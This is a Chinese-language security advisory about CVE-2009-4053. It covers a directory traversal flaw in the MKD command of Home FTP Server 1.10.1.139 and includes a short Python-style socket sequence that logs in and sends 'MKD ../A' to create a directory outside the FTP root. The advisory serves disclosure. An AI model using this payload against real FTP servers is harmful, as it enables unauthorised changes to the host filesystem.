发布日期：2009-11-17
更新日期：2009-11-18

受影响系统：

Ari Pikivirta Home FTP Server 1.10.1.139

描述：

---

BUGTRAQ  ID: 37041
CVE ID: CVE-2009-4053

Home Ftp Server是一款简单易用的FTP服务器。  

Home FTP Server没有正确的过滤用户在MKD命令中所提供的输入，通过认证的用户可以通过以下步骤在FTP根目录之外创建目录：

1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("MKD ../A\r\n")
5.sock.close()

<*来源：zhangmc （zhangmc@mail.ustc.edu.cn）
  
  链接：http://marc.info/?l=bugtraq&m=125847643300561&w=2
        http://secunia.com/advisories/37381/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://marc.info/?l=bugtraq&m=125847643300561&w=2

建议：

---

厂商补丁：

Ari Pikivirta
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://downstairs.dnsalias.net/homeftpserver.html

浏览次数：3577
严重程度：0（网友投票）